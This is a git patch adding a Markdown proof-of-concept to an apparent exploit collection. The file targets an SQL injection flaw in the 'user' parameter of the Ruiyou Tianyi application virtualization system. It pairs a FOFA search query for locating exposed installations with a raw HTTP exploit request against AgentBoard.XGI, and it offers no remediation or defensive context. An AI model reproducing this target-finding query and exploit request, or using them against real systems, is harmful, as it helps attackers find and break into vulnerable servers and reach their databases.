From 8ca917d24bed849e970f976a520e3cae05614857 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Mon, 5 Feb 2024 09:00:11 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E5=A4=A9=E7=BF=BC=E5=BA=94=E7=94=A8?=
 =?UTF-8?q?=E8=99=9A=E6=8B=9F=E5=8C=96=E7=B3=BB=E7=BB=9Fsql=E6=B3=A8?=
 =?UTF-8?q?=E5=85=A5=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 天翼应用虚拟化系统sql注入漏洞.md | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 天翼应用虚拟化系统sql注入漏洞.md

diff --git a/天翼应用虚拟化系统sql注入漏洞.md b/天翼应用虚拟化系统sql注入漏洞.md
new file mode 100644
index 0000000..7378a1a
--- /dev/null
+++ b/天翼应用虚拟化系统sql注入漏洞.md
@@ -0,0 +1,23 @@
+## 天翼应用虚拟化系统sql注入漏洞
+
+天翼应用虚拟化系统 user 参数存在sql注入漏洞
+
+## fofa
+```
+title="瑞友天翼-应用虚拟化系统" 
+```
+
+## poc
+```
+GET /AgentBoard.XGI?user=/AgentBoard.XGI?user=-1&cmd=UserLogin HTTP/1.1
+Host: target
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/de037448-69f3-4224-a47b-96d64274d0da)